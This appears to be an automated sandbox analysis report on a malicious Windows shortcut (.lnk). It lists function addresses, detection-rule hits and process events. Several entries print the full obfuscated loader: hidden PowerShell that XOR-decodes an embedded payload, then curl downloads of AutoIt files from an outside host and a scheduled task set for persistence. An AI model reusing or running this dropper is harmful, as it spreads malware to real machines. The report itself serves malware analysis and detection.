vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DC1B008_2_00007FF7F1DC1B00
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1D9A9B48_2_00007FF7F1D9A9B4
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DDE9308_2_00007FF7F1DDE930
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DA44A48_2_00007FF7F1DA44A4
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DDCB608_2_00007FF7F1DDCB60
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DA06588_2_00007FF7F1DA0658
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DABDE08_2_00007FF7F1DABDE0
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DBADC88_2_00007FF7F1DBADC8
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DAB8408_2_00007FF7F1DAB840
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1D91AB08_2_00007FF7F1D91AB0
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DB49D08_2_00007FF7F1DB49D0
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DD29308_2_00007FF7F1DD2930
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DBE4F08_2_00007FF7F1DBE4F0
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DC2C888_2_00007FF7F1DC2C88
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DAF4588_2_00007FF7F1DAF458
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DA0C748_2_00007FF7F1DA0C74
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DCCBDC8_2_00007FF7F1DCCBDC
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DA7BAC8_2_00007FF7F1DA7BAC
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DA9B608_2_00007FF7F1DA9B60
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1D9BB5B8_2_00007FF7F1D9BB5B
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DD83508_2_00007FF7F1DD8350
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1D9DEA08_2_00007FF7F1D9DEA0
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DE0E408_2_00007FF7F1DE0E40
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1D9C55E8_2_00007FF7F1D9C55E
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1D9C5718_2_00007FF7F1D9C571
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1D9C5388_2_00007FF7F1D9C538
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1D9C54B8_2_00007FF7F1D9C54B
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DE4D1C8_2_00007FF7F1DE4D1C
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DB88D88_2_00007FF7F1DB88D8
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DCD8848_2_00007FF7F1DCD884
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DB78888_2_00007FF7F1DB7888
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1D948608_2_00007FF7F1D94860
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DD08048_2_00007FF7F1DD0804
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DCF8108_2_00007FF7F1DCF810
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DE473C8_2_00007FF7F1DE473C
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1D9C7198_2_00007FF7F1D9C719
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DA0F288_2_00007FF7F1DA0F28
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E4A9B412_2_00007FF700E4A9B4
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E8E93012_2_00007FF700E8E930
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E71B0012_2_00007FF700E71B00
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E8CB6012_2_00007FF700E8CB60
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E544A412_2_00007FF700E544A4
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E5BDE012_2_00007FF700E5BDE0
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E6ADC812_2_00007FF700E6ADC8
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E5065812_2_00007FF700E50658
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E5B84012_2_00007FF700E5B840
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E649D012_2_00007FF700E649D0
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E8293012_2_00007FF700E82930
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E41AB012_2_00007FF700E41AB0
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E7CBDC12_2_00007FF700E7CBDC
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E57BAC12_2_00007FF700E57BAC
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E4BB5B12_2_00007FF700E4BB5B
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E59B6012_2_00007FF700E59B60
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E8835012_2_00007FF700E88350
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E6E4F012_2_00007FF700E6E4F0
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E72C8812_2_00007FF700E72C88
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E50C7412_2_00007FF700E50C74
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E5F45812_2_00007FF700E5F458
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E4C57112_2_00007FF700E4C571
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E4C55E12_2_00007FF700E4C55E
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E4C54B12_2_00007FF700E4C54B
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E4C53812_2_00007FF700E4C538
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E94D1C12_2_00007FF700E94D1C
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E4DEA012_2_00007FF700E4DEA0
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E90E4012_2_00007FF700E90E40
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E7F81012_2_00007FF700E7F810
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E8080412_2_00007FF700E80804
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E9473C12_2_00007FF700E9473C
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E50F2812_2_00007FF700E50F28
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E4C71912_2_00007FF700E4C719
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E688D812_2_00007FF700E688D8
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E6788812_2_00007FF700E67888
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E7D88412_2_00007FF700E7D884
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E4486012_2_00007FF700E44860
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: String function: 00007FF7F1DA1E80 appears 69 times
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: String function: 00007FF700E555C4 appears 41 times
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: String function: 00007FF7F1DA50B0 appears 40 times
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: String function: 00007FF700E55658 appears 51 times
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: String function: 00007FF7F1DA5658 appears 51 times
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: String function: 00007FF7F1DB1F00 appears 234 times
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: String function: 00007FF700E550B0 appears 40 times
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: String function: 00007FF700E4A780 appears 52 times
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: String function: 00007FF7F1DA55C4 appears 41 times
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: String function: 00007FF7F1DB1FA0 appears 286 times
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: String function: 00007FF700E54FC8 appears 97 times
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: String function: 00007FF700E61FA0 appears 286 times
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: String function: 00007FF700E61F00 appears 234 times
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: String function: 00007FF7F1D9A780 appears 52 times
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: String function: 00007FF7F1DA4FC8 appears 97 times
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: String function: 00007FF700E51E80 appears 69 times
    Source: knfV5IVjEV.lnk, type: SAMPLEMatched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
    Source: amsi64_7732.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
    Source: 00000003.00000002.1385766867.000001EFF7B59000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
    Source: 00000003.00000002.1383867622.000001EFF7AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
    Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTRMatched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
    Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
    Source: Process Memory Space: powershell.exe PID: 7732, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
    Source: classification engineClassification label: mal100.rans.evad.winLNK@25/11@1/2
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1D93434 CreateToolhelp32Snapshot,GetLastError,CloseHandle,Module32First,Module32Next,8_2_00007FF7F1D93434
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Desktop\knfV5IVjEVJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q4mfwfxv.t0x.ps1Jump to behavior
    Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: knfV5IVjEV.lnkReversingLabs: Detection: 21%
    Source: knfV5IVjEV.lnkVirustotal: Detection: 29%
    Source: GSlLzFnTov.exeString found in binary or memory: curl: try 'curl --help' for more information
    Source: GSlLzFnTov.exeString found in binary or memory: curl: try 'curl --help' for more information
    Source: GSlLzFnTov.exeString found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
    Source: GSlLzFnTov.exeString found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
    Source: GSlLzFnTov.exeString found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
    Source: GSlLzFnTov.exeString found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
    Source: GSlLzFnTov.exeString found in binary or memory: curl: try 'curl --help' for more information
    Source: GSlLzFnTov.exeString found in binary or memory: curl: try 'curl --help' for more information
    Source: GSlLzFnTov.exeString found in binary or memory: curl: try 'curl --help' for more information
    Source: GSlLzFnTov.exeString found in binary or memory: curl: try 'curl --help' for more information
    Source: GSlLzFnTov.exeString found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
    Source: GSlLzFnTov.exeString found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
    Source: GSlLzFnTov.exeString found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
    Source: GSlLzFnTov.exeString found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
    Source: GSlLzFnTov.exeString found in binary or memory: curl: try 'curl --help' for more information
    Source: GSlLzFnTov.exeString found in binary or memory: curl: try 'curl --help' for more information
    Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ||goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ||goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
